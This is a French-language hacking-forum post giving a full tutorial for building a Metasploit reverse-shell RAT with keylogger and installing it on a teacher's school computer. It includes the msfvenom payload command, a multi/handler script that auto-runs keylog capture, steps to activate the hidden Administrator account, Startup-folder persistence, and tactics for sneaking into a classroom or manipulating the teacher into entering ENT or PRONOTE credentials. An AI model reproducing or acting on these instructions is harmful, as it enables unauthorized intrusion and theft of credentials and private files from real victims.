• Join CraxPro and earn real money through our Credit Rewards System. Participate and redeem credits for Bitcoin/USDT. Start earning today!
    Read the detailed thread here

Comment Créer un RAT sous kali linux (KEYLOGGER)

Currently reading:
 Comment Créer un RAT sous kali linux (KEYLOGGER)

kutoramo

Member
LV
0
Joined
Mar 14, 2024
Threads
1
Likes
0
Awards
1
Credits
946©
Cash
0$
I - Réflexion et mise en place

Réfléchissons aux différentes méthodes et leurs efficacités :

- Keylogger ► On lance un .exe qui enregistrera toutes lesfrappes du clavier.

- Cheval de Troie / RAT ► On lance un .exe qui nousdonneras bien plus d'accès à la machine.(Keylogger/Fichiers/Upload/Start VIRUS.exe/ enfin vousconnaissez le but d'un RAT je pense)

- Phishing ► On envoie une page piégée de Pronote. (Trèsrisqué et peu de chance de fonctionner)

II - Ce que j’ai choisi

Personnellement j'ai décidé de RAT, c'est
bien plus simple et bien plus amusant et
on peut trouver des choses intéressantes
sur un ordi professeur (corrigés, USBPerso, cours, ect..)

Maintenant que nous avons décidé la
méthode d'attaque, il nous faut mettre en
place tout ça.

III - Création du RAT

Pour avoir un rendu fiable et sans problème, j'ai décidé de créer un .exe avec msfvenom

1) Génération du .exe

Pour générer notre jolie exe j'ai utilisé le Tool très connu "msfvenom"

Pour l'installer rien de plus simple :

I. On installe le Tool :

Code:
sudo apt install metasploit-framework

II. Maintenant on va fait en sorte d’avoir toute les permission cmd :

Code:
sudo su

III. Ensuite on se rends dans le dossier root

Code:
cd /root

IV. Puis on va enfin créer notre .exe

Code:
msfvenom -p windows/meterpreter/reverse_tcp lhost=REMPLACER PAR VOTRE
IP ! lport=4444 -f exe >win10.exe

V. Ensuite on va voir si le fichier a bien été crée

Code:
ls

Normalement vous devriez voir votre fichier « win10.exe »


1716407899512



VI. Maintenant on va faire en sorte que le fichier se place dans le dossier boot


Code:
cp win10.exe /boot

VII. Ensuite je vais vous montrer comment avoir le fichier (pour les débutants), pour trouver votre fichier
suivez les instructions suivantes :

1)

1716407931049



2)
1716407960132



3)
1716407975592



4)
1716407981479



VIII. Ensuite vous faite passer le fichier de kali linux à Windows soit par DND (Drag And Drop) ou
(glisser déposer) soit via une clé USB si vous le faite par une clé USB voici comment faire (encore
une fois pour les débutants) :

1) Brancher votre clé USB

2) Aller dans « Périphériques », « USB » et repérer votre clé USB pour la repérer regarder votre écran tout en débranchantet en rebranchant votre clé USB et vous devrez voir le nom de votre clé USB apparaitre et disparaitre
1716407992481



3) Ensuite une fois que vous avez repérer votre clé USB cocher là.
1716407999594


4) Ensuite votre clé USB devrait apparaitre ici :
1716408009142


5) Ensuite retourner dans le fichier boot faite un clic droit sur le fichier « win10.exe » et fait « Copy to » ou « Copier vers »et sélectionner votre clé USB

1716408015493


1716408026297


6) Apres avoir mis votre fichier sur votre clé USB il ne vous reste plus qu’à automatiser le processus en lançant
automatiquement le keylogger via METASPLOIT :





IX. Créer le fichier « start.rc » (n’oublier pas de lancer le terminal en mode admin en tapant la
commande
Code:
sudo su
)

Code:
mkdir start.rc

X. On entre dans le fichier start.rc

Code:
cd start.rc

XI. Modifions maintenant le .rc

Code:
nano start.rc

XII. Collez ceci dans le fichier

Code:
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST REMPLACEZ PAR VOTRE IP !
set LPORT 4444
set AutoRunScript post/windows/capture/keylog_recorder
exploit -j -z

XIII. Maintenant il vous faut lancer tout ça avec la commande (cette commande est à lancer juste avant que vous partiez de chez vous pour allais en cours)

Code:
sudo msfconsole -r start.rc

2) Ouvrir le RAT sur l'ordinateur d'un professeur

Vous venez de réaliser le plus difficile, maintenant il vous faut contourner les droits administrateurs
vous aller me demander pourquoi ? et bien vous allais le comprendre très vite
Pour contourner les droits administrateurs vous devrais juste :

1) Ouvrez l'explorateur de fichiers
2) Allez dans C:\Windows\System32
3) Lancer le programme cmd.exe en Admin (clique droit > droits admins)
4) Tapez :
Code:
net user Administrateur /active:yes
Le cmd doit afficher "La commande s'est bien terminée"
Sinon essayez :
Code:
net user Administrator /active:yes
5) Fermer tout
6) Fermer votre session
7) Connectez-vous ensuite la session administrateur
8) Et Normalement vous serez admin.

I. Bon Maintenant il faut lancer le fichier « win10.exe » sur l’ordinateur du prof et je vais vous
donner plusieurs méthodes :

1) Pour la première méthode, qui est je pense la plus facile est que si vous avez deux portes dans votre salle de classe il y en a toujours une que vous pouvez ouvrir de l’intérieur alors ouvrez cette porte de l’intérieur discrètement, ensuite quand vous aurais 1h de perme ou quand vous devrez manger et que vous êtes sûr qu’il n’y a pas une autre classe dans la salle vous rentrerais par la porte que vous avez ouverte auparavant et vous ouvrirais le fichier etc…



2) Pour la deuxième méthode je ne vous la conseille absolument pas car le keylogger ne vas
pas se lancer automatiquement au démarrage de l'ordinateur à cause de cette méthode (et vous devrez donc communiquer avec le prof pour ouvrir votre fichier vous même) vous aller comprendre pourquoi :

Attention :

► Ne pas paniquer, plus vous êtes calmes, plus le prof ne sera d'aucune méfiance
► Prévoir son coup (fin du cours par exemple, ou au début)
ATTENTION : N'oubliez pas que le prof doit taper ses identifiants de connexion ENT ou PRONOTE après avoir lancé votre RAT, donc il faut l'emmener à le faire, lui donner une bonne raison de se connecter, ou il le fera tout seul pour faire l'appel.

Tout est dans la communication, dans les mots que vous choisirez pour le convaincre de seconnecter à son espace.

En résumer cette deuxièmes méthode consiste a parler au prof en disant par exemple que vous voulez tester votre PowerPoint (donc utiliser un binder)

II. Bon ensuite (si vous avez appliquer la première méthode et que vous êtes donc seul dans la classe) vous brancherais votre clé USB a l’ordinateur vous ouvrirais le fichier « win10.exe »
ensuite taper sur les touches windows + r simultanément et taper :

Code:
shell:startup

ou rendez vous directement vers ce chemin d'accès pour coller votre fichier « win10.exe » :

Code:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

ensuite re taper sur les touches windows + r simultanément et taper

Code:
shell:common startup

ou rendez vous directement vers ce chemin d'accès pour coller votre fichier « win10.exe » :

Code:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

(ATTENTION : COLLER BIEN VOTRE FICHIER A CES DEUX CHEMIN D'ACCES DIFFERENT COMME SA VOUS SEREZ SUR QUE VOTRE FICHIER SE LANCE BIEN AU DEMARRAGE DU PC SUR TOUTE LES SESSIONS) :


Ensuite vous pourrais vous déconnecter de votre session et partir de la salle

Voilà le ebook est terminé j'espère que vous avais tous compris 😂
Si vous avez des questions contacter moi sur discord : kutoramo.films ou via le serveur https://discord.gg/mRSESakqNe
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips

Similar threads

Top Bottom